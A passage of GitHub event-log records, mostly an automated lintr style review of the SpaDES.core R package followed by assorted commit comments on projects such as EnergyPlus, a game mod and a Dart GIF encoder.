should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:268:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/downloadData.R#L268) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:269:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/downloadData.R#L269) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:272:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:272:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:272:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:272:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:75:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/moduleMetadata.R#L75) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:131:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/POM.R#L131) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:189:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/POM.R#L189) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:199:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/POM.R#L199) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:216:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/POM.R#L216) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:240:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/POM.R#L240) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:258:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/POM.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:325:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/POM.R#L325) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:363:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/POM.R#L363) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-28T02:44:17Z"}
{"id":"8031526012","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29865990,"position":null,"line":null,"path":null,"commit_id":"1adbf5340b3af3d2516fcbf66b595fc0fabc2224","created_at":"2018-07-28T02:45:23Z","updated_at":"2018-07-28T02:45:23Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [change objects to the objects of the API response to update \"update time\".](https://trello.com/c/G8HFMp2Z/53-change-objects-to-the-objects-of-the-api-response-to-update-update-time)"}},"created_at":"2018-07-28T02:45:23Z"}
{"id":"8031535016","type":"CommitCommentEvent","actor":{"login":"luuucaaas29"},"repo":{"name":"renahnschultz/odonto-system-manager"},"payload":{"comment":{"id":29866004,"position":null,"line":null,"path":null,"commit_id":"c1187be843ecc6d52770138ad4d120a80425646e","created_at":"2018-07-28T02:53:34Z","updated_at":"2018-07-28T02:53:34Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Login e restrição de acesso à paginas sem permissão.](https://trello.com/c/euJ4wIIh/12-login-e-restri%C3%A7%C3%A3o-de-acesso-%C3%A0-paginas-sem-permiss%C3%A3o)"}},"created_at":"2018-07-28T02:53:34Z"}
{"id":"8031541782","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29866023,"position":null,"line":null,"path":null,"commit_id":"ac759e05b2d05c03257eee4d9ea404cbe73716c8","created_at":"2018-07-28T02:59:30Z","updated_at":"2018-07-28T02:59:30Z","author_association":"NONE","body":"158691015_Issue#6792 (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2950 of 2951 tests passed, 1 test warnings)\n\nMessages:\n\n * 2 tests had: ERR diffs.\n * 1 test had: AUD diffs.\n * 1 test had: BND diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 623\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac759e05b2d05c03257eee4d9ea404cbe73716c8-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac759e05b2d05c03257eee4d9ea404cbe73716c8-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-28T02:59:30Z"}
{"id":"8032828359","type":"CommitCommentEvent","actor":{"login":"jsolson"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29870478,"position":null,"line":null,"path":null,"commit_id":"07b3b10b1f9dd77ea50e087e874022ac81aa3cfd","created_at":"2018-07-28T20:00:09Z","updated_at":"2018-07-28T20:00:09Z","author_association":"COLLABORATOR","body":"The titles reflect the parts we have now.\r\n\r\nWe need to get on the same page with future plans for Centaur. You sound like you want to drop the individual tanks and go with a lego approach. I'm not sure how I feel about that. Atlas/Centaur is a workhorse that we should get right.\r\n\r\nSide note: I put 30 tons in LKO last night with an Atlas V Heavy. Putting together an appropriate second stage for it was frustrating. I ended up using a J-2 engine. A four point mount for RL-10s would help bridge that gap.\r\n\r\nEdit: I think only you call it Bossart. It's confusing."}},"created_at":"2018-07-28T20:00:09Z"}
{"id":"8032829318","type":"CommitCommentEvent","actor":{"login":"Meowmaritus"},"repo":{"name":"Meowmaritus/MapStudioVessel"},"payload":{"comment":{"id":29870486,"position":null,"line":null,"path":null,"commit_id":"4c5095cd4e3ae236cf5306d2592c8fd0f455cc43","created_at":"2018-07-28T20:00:43Z","updated_at":"2018-07-28T20:00:43Z","author_association":"OWNER","body":"- Added RegionType and RegionIndex columns to all events\r\n- Added MovePointIndex1, MovePointIndex2, MovePointIndex3, and MovePointIndex4 columns to NPCs and Unused NPCs"}},"created_at":"2018-07-28T20:00:43Z"}
{"id":"8032830002","type":"CommitCommentEvent","actor":{"login":"jimmyff"},"repo":{"name":"jimmyff/dart-gif-encoder"},"payload":{"comment":{"id":29870488,"position":12,"line":10,"path":"pubspec.yaml","commit_id":"b0c14cc43a5a96c5939f6b0f0bf2c571c327de9b","created_at":"2018-07-28T20:01:16Z","updated_at":"2018-07-28T20:01:16Z","author_association":"OWNER","body":"Well there is nothing in the code that's dart2 specific at this point however the complication could come from the dev dependencies `build_runner`. Let me investigate how old a version of build_runner we'd need to use to keep Dart1 support.  As you suggested Dart1 users could just pin the package to v0.2.3.\r\n\r\nDart2 is literally about to land hence the push from the Dart team to get packages updated.\r\nhttps://groups.google.com/a/dartlang.org/forum/#!topic/announce/dX6BJgYYmBE"}},"created_at":"2018-07-28T20:01:16Z"}
{"id":"8032831818","type":"CommitCommentEvent","actor":{"login":"paulahoare"},"repo":{"name":"paulahoare/toolkitten"},"payload":{"comment":{"id":29870496,"position":null,"line":null,"path":null,"commit_id":"1fe5f46da214283b884393418830543d70935cf6","created_at":"2018-07-28T20:02:46Z","updated_at":"2018-07-28T20:02:46Z","author_association":"OWNER","body":"I was catching up on this week's videos today and realised that I don't need to remove duplicates (someone asked that question in video 4!). So, I would need to change the code in lines 300 - 304 and remove the check for duplicates."}},"created_at":"2018-07-28T20:02:46Z"}
